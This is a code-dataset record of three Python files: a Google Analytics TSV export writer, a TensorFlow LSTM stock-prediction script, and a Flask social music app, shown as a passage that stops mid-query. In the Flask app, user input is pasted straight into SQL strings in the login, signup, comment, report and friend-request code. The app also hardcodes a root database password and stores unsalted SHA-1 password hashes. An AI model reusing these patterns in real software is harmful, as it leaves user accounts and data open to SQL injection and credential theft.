[((3159, 3186), 'numpy.random.RandomState', 'np.random.RandomState', (['seed'], {}), '(seed)\n', (3180, 3186), True, 'import numpy as np\n'), ((6535, 6558), 'numpy.ones', 'np.ones', (['num_rows', 'bool'], {}), '(num_rows, bool)\n', (6542, 6558), True, 'import numpy as np\n'), ((9727, 9745), 'numpy.any', 'np.any', (['(offset < 0)'], {}), '(offset < 0)\n', (9733, 9745), True, 'import numpy as np\n'), ((9606, 9677), 'numpy.floor', 'np.floor', (["((time.mjd - self._table['mjd'][0]) * self.steps_per_day + 0.5)"], {}), "((time.mjd - self._table['mjd'][0]) * self.steps_per_day + 0.5)\n", (9614, 9677), True, 'import numpy as np\n'), ((4263, 4282), 'numpy.arange', 'np.arange', (['num_rows'], {}), '(num_rows)\n', (4272, 4282), True, 'import numpy as np\n')]
takeratta/ga-dev-tools
lib/csv_writer.py
19dcf7c750af8214e5a306fc0f8e2b28bef7bb40
# coding=utf-8 # Copyright 2015 Google Inc. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Utility to convert a Data Export API reponse into TSV. This provides utitlites to both print TSV files to the standard output as well as directly to a file. This logic handles all the utf-8 conversion. GetTsvFilePrinter: Returns an instantiated object to output to files. GetTsvScreenPrinter: Returns an instantiated object to output to the screen. UnicodeWriter(): Utf-8 encodes output. ExportPrinter(): Converts the Data Export API response into tabular data. """ __author__ = 'api.nickm@ (Nick Mihailovski)' import codecs import csv import StringIO import sys import types # A list of special characters that need to be escaped. SPECIAL_CHARS = ('+', '-', '/', '*', '=') # TODO(nm): Test leading numbers. def GetTsvFilePrinter(file_name): """Returns a ExportPrinter object to output to file_name. Args: file_name: string The name of the file to output to. Returns: The newly created ExportPrinter object. """ my_handle = open(file_name) writer = UnicodeWriter(my_handle, dialect='excel-tab') return ExportPrinter(writer) def GetTsvScreenPrinter(): """Returns a ExportPrinter object to output to std.stdout.""" writer = UnicodeWriter(sys.stdout, dialect='excel-tab') return ExportPrinter(writer) def GetTsvStringPrinter(f): """Returns a ExportPrinter object to output to std.stdout.""" writer = UnicodeWriter(f, dialect='excel-tab') return ExportPrinter(writer) # Wrapper to output to utf-8. Taken mostly / directly from Python docs: # http://docs.python.org/library/csv.html class UnicodeWriter(object): """A CSV writer which uses the csv module to output csv compatible formats. Will write rows to CSV file "f", which is encoded in the given encoding. """ def __init__(self, f, dialect=csv.excel, encoding='utf-8', **kwds): # Redirect output to a queue self.queue = StringIO.StringIO() self.writer = csv.writer(self.queue, dialect=dialect, **kwds) self.stream = f self.encoder = codecs.getincrementalencoder(encoding)() # pylint: disable=g-bad-name def writerow(self, row): """Writes a CSV row. Args: row: list The row to write to the CSV output. """ self.writer.writerow([s.encode('utf-8') for s in row]) # Fetch UTF-8 output from the queue ... data = self.queue.getvalue() data = data.decode('utf-8') # ... and reencode it into the target encoding data = self.encoder.encode(data) # write to the target stream self.stream.write(data) # empty queue self.queue.truncate(0) # pylint: disable=g-bad-name def writerows(self, rows): """Writes rows for CSV output. Args: rows: list of rows to write. """ for row in rows: self.writerow(row) class ExportPrinter(object): """Utility class to output a the data feed as tabular data.""" def __init__(self, writer): """Initializes the class. Args: writer: Typically an instance of UnicodeWriter. The interface for this object provides two methods, writerow and writerow, which accepts a list or a list of lists respectively and process them as needed. """ self.writer = writer def Output(self, results): """Outputs formatted rows of data retrieved from the Data Export API. This uses the writer object to output the data in the Data Export API. Args: results: The response from the data export API. """ if not results.get('rows'): self.writer.writerow('No Results found') else: self.OutputProfileName(results) self.writer.writerow([]) self.OutputContainsSampledData(results) self.writer.writerow([]) self.OutputQueryInfo(results) self.writer.writerow([]) self.OutputHeaders(results) self.OutputRows(results) self.writer.writerow([]) self.OutputRowCounts(results) self.OutputTotalsForAllResults(results) def OutputProfileName(self, results): """Outputs the profile name along with the qurey.""" profile_name = '' info = results.get('profileInfo') if info: profile_name = info.get('profileName') self.writer.writerow(['Report For View (Profile): ', profile_name]) def OutputQueryInfo(self, results): """Outputs the query used.""" self.writer.writerow(['These query parameters were used:']) query = results.get('query') for key, value in query.iteritems(): if type(value) == types.ListType: value = ','.join(value) else: value = str(value) value = ExcelEscape(value) self.writer.writerow([key, value]) def OutputContainsSampledData(self, results): """Outputs whether the resuls have been sampled.""" sampled_text = 'do not' if results.get('containsSampledData'): sampled_text = 'do' row_text = 'These results %s contain sampled data.' % sampled_text self.writer.writerow([row_text]) def OutputHeaders(self, results): """Outputs all the dimension and metric names in order.""" row = [] for header in results.get('columnHeaders'): row.append(header.get('name')) self.writer.writerow(row) def OutputRows(self, results): """Outputs all the rows in the table.""" # Replace any first characters that have an = with '= for row in results.get('rows'): out_row = [] for cell in row: cell = ExcelEscape(cell) out_row.append(cell) self.writer.writerow(out_row) def OutputRowCounts(self, results): """Outputs how many rows were returned vs rows that were matched.""" items = str(results.get('itemsPerPage')) matched = str(results.get('totalResults')) output = [ ['Rows Returned', items], ['Rows Matched', matched] ] self.writer.writerows(output) def OutputTotalsForAllResults(self, results): """Outputs the totals for all results matched by the query. This is not the sum of the values returned in the response. This will align the metric totals in the same columns as the headers are printed. The totals are stored as a dict, where the key is the metric name and the value is the total. To align these totals in the proper columns, a position index of the metric name and it's position in the table is first created. Then the totals are added by position to a row of empty strings. Args: results: API Response from Core Reporting API. """ # Create the metric position index. metric_index = {} headers = results.get('columnHeaders') for index in range(0, len(headers)): header = headers[index] if header.get('columnType') == 'METRIC': metric_index[header.get('name')] = index # Create a row of empty strings the same length as the header. row = [''] * len(headers) # Use the position index to output the totals in the right columns. totals = results.get('totalsForAllResults') for metric_name, metric_total in totals.iteritems(): index = metric_index[metric_name] row[index] = metric_total self.writer.writerows([['Totals For All Rows Matched'], row]) def ExcelEscape(input_value): """Escapes the first character of a string if it is special in Excel. Args: input_value: string The value to escape. Returns: A string that has the first character escaped if it is special. """ if input_value and input_value[0] in SPECIAL_CHARS: return "'" + input_value return input_value
[((2465, 2484), 'StringIO.StringIO', 'StringIO.StringIO', ([], {}), '()\n', (2482, 2484), False, 'import StringIO\n'), ((2503, 2550), 'csv.writer', 'csv.writer', (['self.queue'], {'dialect': 'dialect'}), '(self.queue, dialect=dialect, **kwds)\n', (2513, 2550), False, 'import csv\n'), ((2590, 2628), 'codecs.getincrementalencoder', 'codecs.getincrementalencoder', (['encoding'], {}), '(encoding)\n', (2618, 2628), False, 'import codecs\n')]
yuwenxianglong/zhxsh.github.io
resdata/TensorFlow/RNN_Prediction/stockPrediction202005201318.py
427d14b787e55df26e03a069288815b14ab6b534
# -*- coding: utf-8 -*- """ @Project : RNN_Prediction @Author : Xu-Shan Zhao @Filename: stockPrediction202005201318.py @IDE : PyCharm @Time1 : 2020-05-20 13:18:46 @Time2 : 2020/5/20 13:18 @Month1 : 5月 @Month2 : 五月 """ import tushare as ts import tensorflow as tf import pandas as pd from sklearn.model_selection import train_test_split import matplotlib.pyplot as plt stock_catl = ts.get_hist_data('300750') stock_catl = stock_catl.sort_index(ascending=True) stock_catl = (stock_catl - stock_catl.mean()) / \ (stock_catl.max() - stock_catl.min()) # train, val = train_test_split(stock_catl, test_size=0.5) # train = train.sort_index(ascending=True) # val = val.sort_index(ascending=True) train = stock_catl.iloc[:-60, :] val = stock_catl.iloc[-60:, :] window_size = 30 column = 'high' epoches = 300 def batch_dataset(dataset): dataset_batched = dataset.batch(window_size, drop_remainder=True) return dataset_batched def zip_ds(dataset): ds_data = tf.constant(dataset.values, dtype=tf.float32) ds_data = tf.data.Dataset.from_tensor_slices(ds_data). \ window(window_size, shift=1).flat_map(batch_dataset) ds_label = tf.constant(dataset.values[window_size:], dtype=tf.float32) ds_label = tf.data.Dataset.from_tensor_slices(ds_label) ds_train = tf.data.Dataset.zip((ds_data, ds_label)).batch(128).repeat() return ds_train ds_train = zip_ds(train) ds_val = zip_ds(val) model = tf.keras.Sequential( [ tf.keras.layers.LSTM(128, return_sequences=True, activation='relu'), tf.keras.layers.LSTM(128, activation='relu'), tf.keras.layers.Dense(13) ] ) optimizer = tf.keras.optimizers.Adam(learning_rate=0.01) model.compile(optimizer=optimizer, loss='mse') history = model.fit( ds_train, epochs=epoches, steps_per_epoch=5, validation_data=ds_val, validation_steps=1 ) model.save('stockLSTM') # Plot loss function plt.figure(figsize=(19, 9)) ax = plt.gca() plt.plot(range(len(history.history['loss'])), history.history['loss']) plt.plot(range(len(history.history['val_loss'])), history.history['val_loss']) ax.set_yscale('log') plt.show() # Compare fitting and real values. dff = pd.DataFrame() for i in range(len(stock_catl) - window_size): fits = model.predict(tf.constant(tf.expand_dims(stock_catl.values[i:i + window_size, :], axis=0))) dffits = pd.DataFrame(fits, columns=stock_catl.columns) dff = dff.append(dffits) dff.index = stock_catl.index[window_size:] plt.figure(figsize=(19, 9)) dff[column].plot() stock_catl.iloc[window_size:, :][column].plot(style='-o') plt.show() # To predict future 100 business days. dfp = stock_catl.copy() for i in range(100): pres = model.predict(tf.constant(tf.expand_dims(dfp.values[-1 * window_size:], axis=0))) dfpres = pd.DataFrame(pres, columns=stock_catl.columns) dfp = dfp.append(dfpres, ignore_index=True) dfp[column].plot() plt.show()
[((394, 420), 'tushare.get_hist_data', 'ts.get_hist_data', (['"""300750"""'], {}), "('300750')\n", (410, 420), True, 'import tushare as ts\n'), ((1660, 1704), 'tensorflow.keras.optimizers.Adam', 'tf.keras.optimizers.Adam', ([], {'learning_rate': '(0.01)'}), '(learning_rate=0.01)\n', (1684, 1704), True, 'import tensorflow as tf\n'), ((1926, 1953), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(19, 9)'}), '(figsize=(19, 9))\n', (1936, 1953), True, 'import matplotlib.pyplot as plt\n'), ((1959, 1968), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1966, 1968), True, 'import matplotlib.pyplot as plt\n'), ((2140, 2150), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2148, 2150), True, 'import matplotlib.pyplot as plt\n'), ((2193, 2207), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2205, 2207), True, 'import pandas as pd\n'), ((2492, 2519), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(19, 9)'}), '(figsize=(19, 9))\n', (2502, 2519), True, 'import matplotlib.pyplot as plt\n'), ((2597, 2607), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2605, 2607), True, 'import matplotlib.pyplot as plt\n'), ((2913, 2923), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2921, 2923), True, 'import matplotlib.pyplot as plt\n'), ((991, 1036), 'tensorflow.constant', 'tf.constant', (['dataset.values'], {'dtype': 'tf.float32'}), '(dataset.values, dtype=tf.float32)\n', (1002, 1036), True, 'import tensorflow as tf\n'), ((1174, 1233), 'tensorflow.constant', 'tf.constant', (['dataset.values[window_size:]'], {'dtype': 'tf.float32'}), '(dataset.values[window_size:], dtype=tf.float32)\n', (1185, 1233), True, 'import tensorflow as tf\n'), ((1249, 1293), 'tensorflow.data.Dataset.from_tensor_slices', 'tf.data.Dataset.from_tensor_slices', (['ds_label'], {}), '(ds_label)\n', (1283, 1293), True, 'import tensorflow as tf\n'), ((2371, 2417), 'pandas.DataFrame', 'pd.DataFrame', (['fits'], {'columns': 'stock_catl.columns'}), '(fits, columns=stock_catl.columns)\n', (2383, 2417), True, 'import pandas as pd\n'), ((2799, 2845), 'pandas.DataFrame', 'pd.DataFrame', (['pres'], {'columns': 'stock_catl.columns'}), '(pres, columns=stock_catl.columns)\n', (2811, 2845), True, 'import pandas as pd\n'), ((1482, 1549), 'tensorflow.keras.layers.LSTM', 'tf.keras.layers.LSTM', (['(128)'], {'return_sequences': '(True)', 'activation': '"""relu"""'}), "(128, return_sequences=True, activation='relu')\n", (1502, 1549), True, 'import tensorflow as tf\n'), ((1559, 1603), 'tensorflow.keras.layers.LSTM', 'tf.keras.layers.LSTM', (['(128)'], {'activation': '"""relu"""'}), "(128, activation='relu')\n", (1579, 1603), True, 'import tensorflow as tf\n'), ((1613, 1638), 'tensorflow.keras.layers.Dense', 'tf.keras.layers.Dense', (['(13)'], {}), '(13)\n', (1634, 1638), True, 'import tensorflow as tf\n'), ((2292, 2355), 'tensorflow.expand_dims', 'tf.expand_dims', (['stock_catl.values[i:i + window_size, :]'], {'axis': '(0)'}), '(stock_catl.values[i:i + window_size, :], axis=0)\n', (2306, 2355), True, 'import tensorflow as tf\n'), ((2730, 2783), 'tensorflow.expand_dims', 'tf.expand_dims', (['dfp.values[-1 * window_size:]'], {'axis': '(0)'}), '(dfp.values[-1 * window_size:], axis=0)\n', (2744, 2783), True, 'import tensorflow as tf\n'), ((1051, 1094), 'tensorflow.data.Dataset.from_tensor_slices', 'tf.data.Dataset.from_tensor_slices', (['ds_data'], {}), '(ds_data)\n', (1085, 1094), True, 'import tensorflow as tf\n'), ((1309, 1349), 'tensorflow.data.Dataset.zip', 'tf.data.Dataset.zip', (['(ds_data, ds_label)'], {}), '((ds_data, ds_label))\n', (1328, 1349), True, 'import tensorflow as tf\n')]
MuShMe/MuShMe
src/mushme.py
dbc9b940c827039016d7917d535882b47d7d8e5b
#!/usr/bin/env python # -*- coding: utf-8 -*- from src import app import os import shutil from flask import Flask, render_template, session, request, flash, url_for, redirect from Forms import ContactForm, LoginForm, editForm, ReportForm, CommentForm, searchForm, AddPlaylist from flask.ext.mail import Message, Mail from werkzeug import secure_filename from werkzeug import SharedDataMiddleware from api import API from songs import SONG from playlist import playlist from admin import admin from artist import artist import pymysql import hashlib from flask import g mail = Mail() mail.init_app(app) #For the collector script. app.register_blueprint(API); #For the songs app.register_blueprint(SONG); #For the playlist app.register_blueprint(playlist); #for the admin pages app.register_blueprint(admin); #for the artist pages app.register_blueprint(artist); UPLOAD_FOLDER = "img/ProfilePic/" ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif']) app.config['UPLOAD_FOLDER'] = 'src/static/' + UPLOAD_FOLDER @app.route('/') def index(): session["login"] = False session["signup"] = False session["logged_in"] = False return render_template('homepage/index.html', form1=LoginForm(prefix='form1'), form2=ContactForm(prefix='form2')) #For database connections. @app.before_request def before_request(): g.conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='crimson', db='MuShMe', charset='utf8') g.database = g.conn.cursor() @app.teardown_request def teardown_request(exception): g.conn.close() @app.route('/login', methods=['POST']) def login(): session["login"] = True session["signup"] = False if request.method == 'POST': loginform = LoginForm(request.form, prefix='form1') if loginform.validate_on_submit(): check_login = g.database.execute("""SELECT User_id from MuShMe.entries WHERE Email_id="%s" AND Pwdhash="%s" """ % (loginform.email.data, hashlib.sha1(loginform.password.data).hexdigest())) if check_login: userid= g.database.fetchone() g.database.execute("""UPDATE MuShMe.entries SET Last_Login=CURRENT_TIMESTAMP() WHERE User_id="%s" """ % (userid)) g.conn.commit() for uid in userid: session['userid'] = uid g.database.execute("""SELECT Username from MuShMe.entries WHERE User_id="%s" """ % uid ) session['UserName']=g.database.fetchone()[0] g.database.execute("""SELECT Privilege FROM MuShMe.entries WHERE User_id="%s" """ % uid) session['privilege'] = g.database.fetchone()[0] g.database.execute("""SELECT Profile_pic FROM MuShMe.entries WHERE User_id="%s" """ % uid) session['profilepic'] = g.database.fetchone()[0] g.database.execute("""SELECT Name from MuShMe.entries WHERE User_id="%s" """ % uid ) session["Name"]=g.database.fetchone() g.database.execute("""SELECT DOB from MuShMe.entries WHERE User_id="%s" """ % uid ) session["dob"]=str(g.database.fetchone()) session['logged_in'] = True session['logged_in']=True #print uid #print userid return redirect(url_for('userProfile', userid=uid)) else: flash("Incorrect Email-Id or Password") else: flash("Incorrect Email-Id or Password") return render_template('homepage/index.html', form1=loginform, form2=ContactForm(prefix='form2')) else: return redirect(url_for(('index'))) def flash_errors(form): for field, errors in form.errors.items(): for error in errors: flash(u"Error in the %s field - %s" % ( getattr(form, field).label.text, error )) @app.route('/signup', methods=['POST']) def signup(): session["signup"] = True session["login"] = False contactform = ContactForm(request.form, prefix='form2') if contactform.validate_on_submit(): if validate(contactform.email.data,contactform.username.data): check_signup = g.database.execute("""INSERT into MuShMe.entries (Username,Email_id,Pwdhash,Name) VALUES ("%s","%s","%s","%s")""" % (contactform.username.data, contactform.email.data, hashlib.sha1(contactform.password.data).hexdigest(),contactform.name.data, )) if check_signup: g.conn.commit() g.database.execute("""SELECT User_id from MuShMe.entries WHERE Email_id="%s" AND Pwdhash="%s" """ % (contactform.email.data, hashlib.sha1(contactform.password.data).hexdigest())) user_id = g.database.fetchone() for uid in user_id: session['userid'] = uid g.database.execute("""SELECT Username from MuShMe.entries WHERE User_id="%s" """ % uid ) session['UserName']=g.database.fetchone()[0] g.database.execute("""SELECT Privilege FROM MuShMe.entries WHERE User_id="%s" """ % uid) session['privilege'] = g.database.fetchone()[0] g.database.execute("""SELECT Profile_Pic FROM MuShMe.entries WHERE User_id="%s" """ % uid) session['profilepic'] = g.database.fetchone()[0] session['logged_in'] = True g.database.execute("""SELECT Name from MuShMe.entries WHERE User_id="%s" """ % uid ) session["Name"]=g.database.fetchone() g.database.execute("""SELECT DOB from MuShMe.entries WHERE User_id="%s" """ % uid ) session["dob"]=str(g.database.fetchone()) newPlaylist = session['UserName'] + ' default collection' g.database.execute("""INSERT INTO MuShMe.playlists (Playlist_name, User_id) VALUES ("%s","%s")""" % (newPlaylist,uid)) g.conn.commit() return redirect(url_for('userProfile',userid=uid)) else: flash("Please enter valid data !") else: flash("Username or Email has been taken") else: flash_errors(contactform) return render_template('homepage/index.html', form1=LoginForm(prefix='form1'), form2=contactform) def validate(email,username): email = g.database.execute(""" SELECT * from MuShMe.entries where Email_id="%s" """ % email) name = g.database.execute(""" SELECT * from MuShMe.entries where Username="%s" """ % username) if email or name: return False else: return True @app.route('/user/<userid>',methods=['GET']) def userProfile(userid): if session['logged_in'] == False: return render_template('error.html'), 404 else: if request.method == 'GET': User=getUserData(userid) return render_template('userprofile/index.html', userid=userid, form4=CommentForm(prefix='form4'), form3=editForm(prefix='form3'), form6=searchForm(prefix='form6'), form5=ReportForm(prefix='form5'),form7=AddPlaylist(prefix='form7'), friend=getFriend(userid), playlist=getPlaylist(userid), User=getUserData(userid), Comments=getComments(userid), songs=getSong(userid), Recommends=getRecommend(userid), Requests=getRequest(userid),frnd=checkFriend(userid,User), AllComments=getAllComments(userid), AllRecommends=getAllRecommend(userid)) def checkFriend(userid,User): friendName =[] g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" """ % (userid)) for user in g.database.fetchall(): data = {} g.database.execute("""SELECT Username, User_id from MuShMe.entries WHERE User_id="%s" """ % user[0]) for a in g.database.fetchall(): data['friendname']=a[0] data['friendid']=a[1] friendName.append(data) for f in friendName: a=g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" and User_id2="%s" """ % (userid,f['friendid'])) b=g.database.execute("""SELECT User_id2 from friends WHERE User_id2="%s" and User_id1="%s" """ % (userid,f['friendid'])) if a or b: return True elif userid == f['friendid']: return True else: return False g.database.execute("""SELECT User_id1 from friends WHERE User_id2="%s" """ % userid) for user in g.database.fetchall(): data = {} g.database.execute("""SELECT Username, User_id from MuShMe.entries WHERE User_id="%s" """ % user[0]) for a in g.database.fetchall(): data['friendname']=a[0] data['friendid']=a[1] friendName.append(data) for f in friendName: a=g.database.execute("""SELECT User_id2 from friends WHERE User_id2="%s" and User_id1="%s" """ % (userid,f['friendid'])) b=g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" and User_id2="%s" """ % (userid,f['friendid'])) if a or b: return True elif userid == f['friendid']: return True else: return False def getAllComments(userid): g.database.execute("SELECT Comment_id FROM user_comments WHERE User_id=%s ORDER BY Comment_id DESC" % (userid)) commentids = g.database.fetchall() retval = [] for commentid in commentids: g.database.execute("SELECT Comment, User_id FROM comments WHERE Comment_id=%s", (commentid[0])) commentdata = g.database.fetchone() data = {} data['comment'] = commentdata[0] data['userid'] = commentdata[1] data['commentid'] = commentid[0] g.database.execute("SELECT Username FROM entries WHERE User_id=%s", (data['userid'])) data['username'] = g.database.fetchone()[0] retval.append(data) return retval def getComments(userid): g.database.execute("SELECT Comment_id FROM user_comments WHERE User_id=%s ORDER BY Comment_id DESC LIMIT 5" % (userid)) commentids = g.database.fetchall() retval = [] for commentid in commentids: g.database.execute("SELECT Comment, User_id FROM comments WHERE Comment_id=%s", (commentid[0])) commentdata = g.database.fetchone() data = {} data['comment'] = commentdata[0] data['userid'] = commentdata[1] data['commentid'] = commentid[0] g.database.execute("SELECT Username FROM entries WHERE User_id=%s", (data['userid'])) data['username'] = g.database.fetchone()[0] retval.append(data) return retval def getFriend(userid): friendName =[] g.database.execute("""SELECT User_id2 from friends WHERE User_id1="%s" """ % userid) for user in g.database.fetchall(): data = {} g.database.execute("""SELECT Username, User_id, Profile_pic from MuShMe.entries WHERE User_id="%s" """ % user[0]) for a in g.database.fetchall(): data['friendname']=a[0] data['friendid']=a[1] data['friendpic']=a[2] friendName.append(data) g.database.execute("""SELECT User_id1 from friends WHERE User_id2="%s" """ % userid) for user in g.database.fetchall(): data = {} g.database.execute("""SELECT Username, User_id, Profile_pic from MuShMe.entries WHERE User_id="%s" """ % user[0]) for a in g.database.fetchall(): data['friendname']=a[0] data['friendid']=a[1] data['friendpic']=a[2] friendName.append(data) print friendName return friendName def getPlaylist(userid): playlist = [] g.database.execute("""SELECT Playlist_name,Playlist_id from MuShMe.playlists WHERE User_id="%s" """ % userid) for p in g.database.fetchall(): data = {} data['pname']=p[0] data['pid']=p[1] playlist.append(data) return playlist def getSong(userid): songName = [] g.database.execute("""SELECT Song_id from MuShMe.user_song WHERE User_id=%s LIMIT 5""" % userid) for song in g.database.fetchall(): data = {} g.database.execute("""SELECT Song_title,Song_id,Song_Album from MuShMe.songs WHERE Song_id="%s" """ % song) for a in g.database.fetchall(): data['songname']=a[0] data['songid']=a[1] g.database.execute("SELECT Album_pic FROM albums WHERE Album_id=%s " % (a[2])) g.conn.commit() data['art'] = g.database.fetchone()[0] songName.append(data) return songName def getUserData(userid): User = [] g.database.execute(""" SELECT Username,User_id,Profile_pic,Privilege,Email_id,Name,DOB from entries where User_id="%s" """ % userid) for a in g.database.fetchall(): data={} data['username']=a[0] data['userid']=a[1] data['profilepic'] = a[2] data['privilege']=a[3] data['email']=a[4] data['name']=a[5] data['dob']=str(a[6]) User.append(data) return User def getAllRecommend(userid): recommend =[] g.database.execute(""" SELECT Recommend_id,User_id_from,User_id_to from recommend where User_id_to="%s" """ % userid) for a in g.database.fetchall(): data={} data['rid']=a[0] data['userfrom'] = a[1] data['userto']=a[2] g.database.execute(""" SELECT Username from entries where User_id='%s' """ % a[1]) data['userfromname'] = g.database.fetchone()[0] check_song = g.database.execute(""" SELECT Song_id from recommend_songs where Recommend_id="%s" """ % a[0]) if check_song: songid = g.database.fetchone()[0] data['song'] = [] g.database.execute(""" SELECT Song_title,Song_Album,Genre,Publisher from songs where Song_id="%s" """ % songid) for song in g.database.fetchall(): d = {} d['title']=song[0] d['album'] = song[1] d['genre'] = song[2] d['publisher'] = song[3] d['songid'] = songid data['song'].append(d) check_playlist = g.database.execute(""" SELECT Playlist_id from recommend_playlists where Recommend_id="%s" """ % a[0]) if check_playlist: playlistid = g.database.fetchone()[0] data['playlist'] = [] g.database.execute(""" SELECT Playlist_name,Playlist_id,User_id from playlists where Playlist_id="%s" """ % playlistid) for p in g.database.fetchall(): d= {} d['pname']=p[0] d['pid']=p[1] g.database.execute(""" SELECT Username, Name,User_id from MuShMe.entries WHERE User_id="%s" """ % p[2]) for k in g.database.fetchall(): d['username']=k[0] d['uname']=k[1] d['userid']=k[2] data['playlist'].append(d) recommend.append(data) return recommend def getRecommend(userid): recommend =[] g.database.execute(""" SELECT Recommend_id,User_id_from,User_id_to from recommend where User_id_to="%s" LIMIT 5 """ % userid) for a in g.database.fetchall(): data={} data['rid']=a[0] data['userfrom'] = a[1] data['userto']=a[2] g.database.execute(""" SELECT Username from entries where User_id='%s' """ % a[1]) data['userfromname'] = g.database.fetchone()[0] print data['userfromname'] check_song = g.database.execute(""" SELECT Song_id from recommend_songs where Recommend_id="%s" """ % a[0]) if check_song: songid = g.database.fetchone()[0] data['song'] = [] g.database.execute(""" SELECT Song_title,Song_Album,Genre,Publisher from songs where Song_id="%s" """ % songid) for song in g.database.fetchall(): d = {} d['title']=song[0] d['album'] = song[1] d['genre'] = song[2] d['publisher'] = song[3] d['songid'] = songid d['songart'] = getSongArt(songid) data['song'].append(d) check_playlist = g.database.execute(""" SELECT Playlist_id from recommend_playlists where Recommend_id="%s" """ % a[0]) if check_playlist: playlistid = g.database.fetchone()[0] data['playlist'] = [] g.database.execute(""" SELECT Playlist_name,Playlist_id,User_id from playlists where Playlist_id="%s" """ % playlistid) for p in g.database.fetchall(): d= {} d['pname']=p[0] d['pid']=p[1] g.database.execute(""" SELECT Username, Name,User_id from MuShMe.entries WHERE User_id="%s" """ % p[2]) for k in g.database.fetchall(): d['username']=k[0] d['uname']=k[1] d['userid']=k[2] data['playlist'].append(d) recommend.append(data) return recommend def getRequest(userid): request =[] g.database.execute(""" SELECT Request_id,Request_from,Request_to,Status from requests where Request_to="%s" """ % userid) for a in g.database.fetchall(): data={} data['reqid']=a[0] data['reqfrom'] = a[1] data['reqto']=a[2] data['status']=a[3] data['reqfromuser'] = [] g.database.execute(""" SELECT User_id,Username,Name from entries where User_id='%s' """ % a[1]) for i in g.database.fetchall(): d={} d['userid'] = i[0] d['username'] = i[1] d['name'] = i[2] data['reqfromuser'].append(d) print data request.append(data) return request def getSongArt(songid): g.database.execute("SELECT Song_Album FROM songs WHERE song_id=%s", (songid)) albumname = g.database.fetchone()[0] g.database.execute("SELECT Album_pic FROM albums WHERE Album_id=%s", (albumname)) return g.database.fetchone()[0] @app.route('/user/<userid>/edit',methods=['POST','GET']) def editName(userid): if request.method == 'POST': uid = userid print request.form if request.form['editname'] != '': g.database.execute("""UPDATE MuShMe.entries SET Name=%s WHERE User_id=%s """, ([request.form['editname']], userid)) g.conn.commit() if request.form['birthday_year'] != '0' and request.form['birthday_month'] != '0' and request.form['birthday_day'] != '0': g.database.execute("""UPDATE MuShMe.entries SET DOB="%s-%s-%s" WHERE User_id="%s" """ % (request.form['birthday_year'],request.form['birthday_month'],request.form['birthday_day'], userid)) g.conn.commit() return redirect(url_for('userProfile',userid=userid)) else: return redirect(url_for('userProfile', userid=userid)) def allowed_file(filename): return '.' in filename and \ filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS @app.route('/user/<userid>/file', methods=['GET', 'POST']) def upload_file(userid): if request.method == 'POST': file = request.files['file'] if file and allowed_file(file.filename): filename = secure_filename(file.filename) file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) filepath = UPLOAD_FOLDER + filename session['profilepic'] = filepath g.database.execute("""UPDATE MuShMe.entries SET Profile_pic="%s" WHERE User_id="%s" """ % (filepath, userid)) g.conn.commit() return redirect(url_for('userProfile', userid=userid)) app.add_url_rule('/user/uploads/<filename>', 'uploaded_file',build_only=True) app.wsgi_app = SharedDataMiddleware(app.wsgi_app, {'/user/uploads': 'src/static' + app.config['UPLOAD_FOLDER'] }) @app.route('/user/<rcvrid>.<senderid>/comment',methods=['POST','GET']) def comment(rcvrid, senderid): if request.method == 'POST': commentform = CommentForm(request.form, prefix='form4') #print senderid #print rcvrid if commentform.comment.data: query = ("""INSERT INTO MuShMe.comments (comment_type, Comment, User_id) VALUES ("%s","%s","%s") """ % ('U',commentform.comment.data, senderid)) print query g.database.execute(query) g.conn.commit() g.database.execute("""SELECT Comment_id from MuShMe.comments WHERE Comment="%s" """ % (commentform.comment.data)) data = g.database.fetchone()[0] #print data enter_comment = g.database.execute("""INSERT INTO MuShMe.user_comments (Comment_id, User_id) VALUES ("%s","%s")""" % (data,rcvrid)) if enter_comment: g.conn.commit() g.database.execute("""SELECT User_id FROM MuShMe.user_comments WHERE Comment_id="%s" """ % data) #print g.database.fetchone()[0] return redirect(url_for('userProfile', userid=rcvrid)) @app.route('/user/<userid>/<commentid>/report',methods=['POST','GET']) def report(userid,commentid): if request.method == 'POST': reportform = ReportForm(request.form, prefix='form5') print reportform.report.data check_report = g.database.execute("""INSERT INTO MuShMe.complaints (Complain_type, Complain_description, Comment_id,reported_by) VALUES ("%s","%s","%s","%s") """ % (reportform.report.data, reportform.other.data, commentid, session['userid'] )) if check_report == True: g.conn.commit() return redirect(url_for('userProfile', userid=userid)) else: return redirect(url_for('userProfile', userid=userid)) @app.route('/user/<uidto>.<uidfrom>/request',methods=['POST']) def sendrequest(uidto,uidfrom): if request.method == 'POST': if requestvalidate(uidfrom,uidto): query=(""" INSERT INTO requests (Request_from,Request_to,Status) VALUES ("%s","%s","%s") """ % (uidfrom,uidto,1)) g.database.execute(query) g.conn.commit() return redirect(url_for('userProfile', userid=uidto)) @app.route('/user/<userto>.<userfrom>/accept',methods=['POST']) def acceptrequest(userto,userfrom): if request.method == 'POST': query=(""" UPDATE requests SET Status="%s" WHERE Request_from="%s" and Request_to="%s" """ % (0,userfrom,userto)) g.database.execute(query) g.conn.commit() query = (""" INSERT INTO friends Values ("%s","%s") """ % (userfrom,userto)) g.database.execute(query) g.conn.commit() return redirect(url_for('userProfile', userid=userto)) @app.route('/user/<userto>.<userfrom>/reject',methods=['POST']) def rejectrequest(userto,userfrom): if request.method == 'POST': query=(""" UPDATE requests SET Status="%s" WHERE Request_from="%s" and 